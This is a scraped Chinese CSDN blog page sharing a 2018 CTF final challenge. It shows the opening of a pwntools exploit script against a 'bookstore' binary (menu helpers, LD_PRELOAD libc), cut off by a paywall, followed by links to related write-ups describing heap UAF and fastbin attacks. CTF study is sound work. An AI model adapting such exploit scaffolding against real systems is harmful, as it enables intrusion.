信息安全铁人三项赛真题解析_【ctf】2018信息安全铁人三项赛个人赛总决赛赛题分享...

最新推荐文章于 2023-11-14 16:28:00 发布
最新推荐文章于 2023-11-14 16:28:00 发布
阅读量610 收藏
点赞数
文章标签: 信息安全铁人三项赛真题解析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39573512/article/details/111811192
版权

本人才疏学浅,在赛场上研究只有一题做出来,剩下两题没做出来请大神指导指导

#!/usr/bin/env python

# -*- coding: UTF-8 -*-

# imports

from pwn import *

import time

import os

import sys

elf = ""

libc = ""

env = ""

LOCAL = 1

context.log_level = "debug"

p = process("./bookstore", env={"LD_PRELOAD":"/tmp/ironthree/book/libc_64.so"})

#p = remote("ip", port) #uncomment this.

p.recvuntil("choice:\n")

def add(name, length, book):

p.sendline("1")

p.recvuntil("name?\n")

p.send(name)

p.recvuntil("name?\n")

p.sendline(str(length))

p.recvuntil("book?\n")

p.send(book)

p.recvuntil("choice:\n")

def sell(idx):

p.sendline(&#

最低0.47元/天 解锁文章
weixin_39573512
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
信息安全铁人三项赛真题解析_2020信息安全铁人三项第一个人赛题解
weixin_35034536的博客
01-13 1183
感谢各位师傅手下留情,感谢出题人不杀之恩说一下,个人赛题目不难,都是UAF还有格式化字符串,很快打完,和各位师傅并列第一,然后就去企业渗透了,所以细节我这里就不啰嗦了,简单说一下思路然后直接贴exp。个人赛heap功能很全,add、delete、show、edit。主要漏洞点在delete中,UAF。因此直接unsorted bin leak libc再进行一次UAF fastbin attack...
信息安全 数据 铁人三项_[信息安全铁人三项总决赛](数据)第三题
weixin_39574388的博客
12-19 390
WriteUpsredis 监听端口号redis ›› grep -n ' port ' ./redis.log25:[983] 05 Sep 12:00:02.029 * The server is now ready to accept connections on port 8889答案 : 8889redis 第一个客户端链接的时间redis ›› grep -v -n '0 client...
2023 铁人三项 CTF --- Misc wp
3tefanie丶zhou的博客
01-12 2340
【不被喜欢的姑娘喜欢,是一件很伤心的事情,可天没有塌下来,该怎么活,还得怎么活。】
第四届“长城杯”信息安全铁人三项 Junk&&language
Todog的博客
03-24 947
xxx
信息安全铁人三项赛真题解析_2018信息安全铁人三项 资格测评WP
weixin_39704246的博客
12-30 594
2018信息安全铁人三项 资格测评1.权限【题目描述】:你是管理员吗?【解题链接】:http://ctf4.shiyanbar.com/web/root/index.php1.进入后会发现hint,标题为password.txt。访问,获取密码字典。2.爆破密码后,在cookie中发现一个网址,访问,进入小黑留言板。3.看到提示,说是让用小黑的账号发留言。尝试发留言,会得到未登录,然后分析数据包...
2018信息安全铁人三项数据赛题题目(数据包分析)
04-30
信息安全铁人三项应运而生,这是一项面向全国大学生的公益性科技类竞,旨在通过整合信息安全产业资源、对接高校,为大学生提供一个进行信息安全技术创新、深入产业行业应用以及扩展安全视野的平台。资源为分区...
智能网联汽车 天融信杯 信息安全攻防 2023 CTF真题
07-14
智能网联汽车 天融信杯 信息安全攻防 2023 CTF真题
CTF信息安全单项选择题.docx
01-25
CTF信息安全单项选择题.
2021一带一路暨金砖大之企业信息系统安全项决样题-(解析
12-18
通过项检验参选手网络组建、安全架构和网络安全运维管控等 方面的技术技能,检验参队组织和团队协作等综合职业素养,培养学 生创新能力和实践动手能力,提升学生职业能力和就业竞争力。通过大 引领专业教学...
2021一带一路暨金砖大之企业信息系统安全项AWD-writeup(解析
12-18
通过项检验参选手网络组建、安全架构和网络安全运维管控等 方面的技术技能,检验参队组织和团队协作等综合职业素养,培养学 生创新能力和实践动手能力,提升学生职业能力和就业竞争力。通过大 引领专业教学...
流量分析(信息安全铁人三项分区2-5.18)
最新发布
whale_waves的博客
11-14 459
像这里就需要知道一个常识, 一般路由器页面的默认管理ip是192.168.0.1 查看每个数据包是否有对这个ip的流量 (筛选后只有数据包1和数据包2有流量 , 先分析数据包1) 查看访问此ip的http流量 ip.addr == 192.168.0.1 && http 查看到这里的时候1.99服务器登录成功以后访问页面返回了路由器平牌型号版本 { "id":1, "result":{ "locale":"zh_CN", "force":false, "radio":2, "model":
信息安全 数据 铁人三项_2018.5.18信息安全铁人三项数据赛题
weixin_39535125的博客
12-19 343
本文原创作者:一叶飘零目录题目描述第一个数据包第三个数据包第四个数据包路由器hacking后记题目描述1.黑客的IP是多少2.服务器1.99的web服务器使用的CMS及其版本号(请直接复制)3.服务器拿到的webshell的网址(请输入url解码后的网址)4.服务器1.99的主机名5.网站根目录的绝对路径(注意最后加斜杠)6.黑客上传的第一个文件名称是什么7.黑客进行内网扫描,扫描的端口都有哪些(...
信息安全铁人三项赛真题解析_信息安全铁人三项二进制部分题解
weixin_29563497的博客
12-30 602
2018-2019季little notechecksecmenu()main()增、删、查四个功能,并且保护基本全开。add()这里需要注意的就是,至多0xF个note并且大小固定0x60,创建完成后会问是否保留,若不保留的话会free掉当前note并创建一个0x20的备份。show()free()freenote()有个UAF。利用思路:这里有个很巧妙的方法,就是第一次利用UAF leak出...
信息安全铁人三项赛真题解析_对 [CrackMe] 【ctf2018信息安全铁人三项个人赛总决赛赛题分享 的一些补充...
weixin_39587238的博客
12-30 502
原贴主地址:https://www.52pojie.cn/thread-837939-1-1.htmllittenote这道题的exp#------------------------------------------------------------------------------------------------------------------------------------...
CTF WEB WP杂谈
yoke__的博客
06-05 642
CTF web方向的一些汇总
铁三入门测试题writeup
热门推荐
JBlock的博客
01-25 1万+
1.你是管理员吗?解题链接:http://ctf4.shiyanbar.com/web/root/index.php 打开链接,我们发现是一个登陆页面,第一步先看页面源码,发现一个password.txt,这里面可能有东西,访问一下http://ctf4.shiyanbar.com/web/root/password.txt发现一个密码字典。 然后用bp爆破密码为Nsf0cuS,我们在bp的
2018.6.1信息安全铁人三项数据writeup
weixin_30387663的博客
12-04 686
链接: https://pan.baidu.com/s/145V_xyiMNOIE5bFbCTtNNg 密码: v6wu 1.被攻击的两个服务器的内网ip分别是多少,以下简称服务器1和2(格式:空格分隔,按黑客攻击顺序排列) 2.两台服务器的主机名分别是什么 3.黑客使用了什么工具对服务器1进行的攻击(小写) 4.黑容成功登陆网站后台的账号密码以及验证码是什么(格式user...
信息安全铁人三项--资质writeup
weixin_30639719的博客
03-17 634
[博客目录] 工具 Burp Suite stegsolve.jar 十六进制编辑器 赛题 第一题 第二题 第三题 第四题 第五题 第六题 1- 工具: 1.1- Burp Suite 一款可以进行再WEB应用程序的集成攻击测试平台。 常用的功能:抓包、重放、爆破 需求:(建议)Burp Suite + Firefox 介绍:Burp Suite使用介绍 代理设置+证书导入:Fi...
2021强网杯Writeup--by Nu1L Team.pdf
06-15
报告涵盖了多个网络安全领域的挑战,包括CTF(Capture The Flag)竞、网络安全和信息安全的相关问题。挑战内容涉及Web安全、SQL注入、权限提升、PHP审计、模板注入、加密算法、二进制漏洞利用、逆向工程等多个方面...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值